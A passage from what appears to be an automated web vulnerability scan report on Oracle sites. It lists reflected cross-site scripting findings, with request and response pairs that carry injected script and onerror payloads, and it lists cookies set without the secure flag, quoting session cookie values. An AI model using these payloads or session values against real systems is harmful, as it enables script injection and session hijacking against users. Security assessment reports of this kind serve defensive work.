s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000
Response
HTTP/1.1 404 Not Found-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=165094625768,0)ervlet/portal32e1e%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E7b624fc905f/PORTAL.wwv_javascript.fetch_script><H1>404 Not Found</H1>DAD "portal32e1e<img src=a onerror=alert(1)>7b624fc905f " not found in URL (http://solutions.oracle.com/portal/pls/portal32e1e<img%20src%3da%20onerror%3dalert(1)>...[SNIP]...
3.14. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_css [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/pls/portal/PORTAL.wwv_setting.render_css
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd6fe<img%20src%3da%20onerror%3dalert(1)>5de35f89a4 was submitted in the REST URL parameter 3. This input was echoed as bd6fe<img src=a onerror=alert(1)>5de35f89a4 in the application's response.
Request
GET /portal/pls/portalbd6fe<img%20src%3da%20onerror%3dalert(1)>5de35f89a4 /PORTAL.wwv_setting.render_css?p_lang_type=NOBIDI&p_subscriberid=1&p_styleid=86637&p_siteid=0&p_rctx=R HTTP/1.1.com/portal/page/portal/searchresults;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/home/basic_search; gpw_e24=http%3A//solutions.oracle.com/home/basic_search; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=83490366698,1)ervlet/portalbd6fe%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E5de35f89a4/PORTAL.wwv_setting.render_css><H1>404 Not Found</H1>DAD "portalbd6fe<img src=a onerror=alert(1)>5de35f89a4 " not found in URL (http://solutions.oracle.com/portal/pls/portalbd6fe<img%20src%3da%20onerror%3dalert(1)>...[SNIP]...
3.15. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_custom_css [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/pls/portal/PORTAL.wwv_setting.render_custom_css
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 77007<img%20src%3da%20onerror%3dalert(1)>e6fca4411c9 was submitted in the REST URL parameter 3. This input was echoed as 77007<img src=a onerror=alert(1)>e6fca4411c9 in the application's response.
Request
GET /portal/pls/portal77007<img%20src%3da%20onerror%3dalert(1)>e6fca4411c9 /PORTAL.wwv_setting.render_custom_css?p_bg_color=FFFFFF&p_is_bidi=0&p_version=10.1.4.1.0.113 HTTP/1.1.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations?p_masterthingid=7668639&p_item_siteid=53&p_pageid=7668625&p_page_siteid=53&p_back_url=http%3A%2F%2Fsolutions.oracle.com%2Fsolutions%2Fbmg%2Fconsulting;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=104965773397,1)ervlet/portal77007%3Cimg%20src%3Da%20onerror%3Dalert(1)%3Ee6fca4411c9/PORTAL.wwv_setting.render_custom_css><H1>404 Not Found</H1>DAD "portal77007<img src=a onerror=alert(1)>e6fca4411c9 " not found in URL (http://solutions.oracle.com/portal/pls/portal77007<img%20src%3da%20onerror%3dalert(1)>...[SNIP]...
3.16. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_custom_css [p_bg_color parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/pls/portal/PORTAL.wwv_setting.render_custom_css
Issue detail
The value of the p_bg_color request parameter is copied into the HTML document as plain text between tags. The payload e210d<script>alert(1)</script>a6e14ea0886 was submitted in the p_bg_color parameter. This input was echoed unmodified in the application's response.
Request
GET /portal/pls/portal/PORTAL.wwv_setting.render_custom_css?p_bg_color=FFFFFFe210d<script>alert(1)</script>a6e14ea0886 &p_is_bidi=0&p_version=10.1.4.1.0.113 HTTP/1.1.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations?p_masterthingid=7668639&p_item_siteid=53&p_pageid=7668625&p_page_siteid=53&p_back_url=http%3A%2F%2Fsolutions.oracle.com%2Fsolutions%2Fbmg%2Fconsulting;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (M;max-age=2592000+0;age=0;ecid=143620341189,1)ervlet/portal/PORTAL.wwv_setting.render_custom_css,sans-serif;...[SNIP]... ,sans-serif; e210d<script>alert(1)</script>a6e14ea0886 tl.gif);<script>...[SNIP]...
4. SSL cookie without secure flag set
previous
next
There are 36 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
4.1. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/emea-apply%20now.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/emea-apply%20now.jsp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/global_current-openings.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus -1252/html4/loose.dtd">...[SNIP]...
4.2. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/emea1-jobs-remove1.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/emea1-jobs-remove1.jsp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/emea-apply%20now.jsp;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus -1252/html4/loose.dtd">...[SNIP]...
4.3. https://campus.oracle.com/campus/HR/us-calendar.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/us-calendar.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/us-calendar.jsp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us_main.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus -1252/html4/loose.dtd">...[SNIP]...
4.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jspSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus /html4/loose.dtd">...[SNIP]...
4.5. https://campus.oracle.com/campus/HR/us-profile-direct.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-direct.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/us-profile-direct.jsp?flag=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus /html4/loose.dtd">...[SNIP]...
4.6. https://campus.oracle.com/campus/HR/us-upload-file.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/us-upload-file.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/us-upload-file.jsp?flag=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus /html4/loose.dtd">...[SNIP]...
4.7. https://cloud.oracle.com/mycloud/f
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://cloud.oracle.com
Path:
/mycloud/f
Issue detail
The following cookies were issued by the application and do not have the secure flag set:WWV_PUBLIC_SESSION_5003=4454627354458997; HttpOnly ORACLE_CLOUD=BC96E6ADD30286BA; HttpOnly BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:05 GMT; path=/
Request
GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service:home:0:::::;q=0.3%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA
Response
HTTP/1.1 302 Moved Temporarily-11g/mycloud/f?p=service2:notify_me:0:::::DD30286BA; HttpOnlySet-Cookie: WWV_PUBLIC_SESSION_5003=4454627354458997; HttpOnly Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:05 GMT; path=/ >.com/mycloud/f?...[SNIP]...
4.8. https://cloud.oracle.com/mycloud/wwv_flow.accept
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cloud.oracle.com
Path:
/mycloud/wwv_flow.accept
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/
Request
POST /mycloud/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service2:notify_me:0:::::;q=0.3DD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names...[SNIP]...
Response
HTTP/1.1 200 OK-11gSet-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/ ...[SNIP]...
4.9. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/IrcVisitor.jsp
Issue detail
The following cookies were issued by the application and do not have the secure flag set:GSI=i3Mem4huzzTQAdgFWILWhbRGmk; domain=.oracle.com; path=/ BIGipServergsiap_irecruitment_http=1527616141.5150.0000; path=/
Request
GET /OA_HTML/IrcVisitor.jsp HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=aI-seAnN7gYCF5vKSizOZg..98453aac9dc9b74d3c9b8937d8701988a5259b0428b92ef860b014a.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secureSet-Cookie: GSI=i3Mem4huzzTQAdgFWILWhbRGmk; domain=.oracle.com; path=/ Set-Cookie: BIGipServergsiap_irecruitment_http=1527616141.5150.0000; path=/ >Redirect to https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW...[SNIP]...
4.10. https://login.oracle.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Request
GET /favicon.ico HTTP/1.1;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 404 Not FoundSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/ ...[SNIP]...
4.11. https://login.oracle.com/mysso/signon.jsp
previous
next
Summary
Severity:
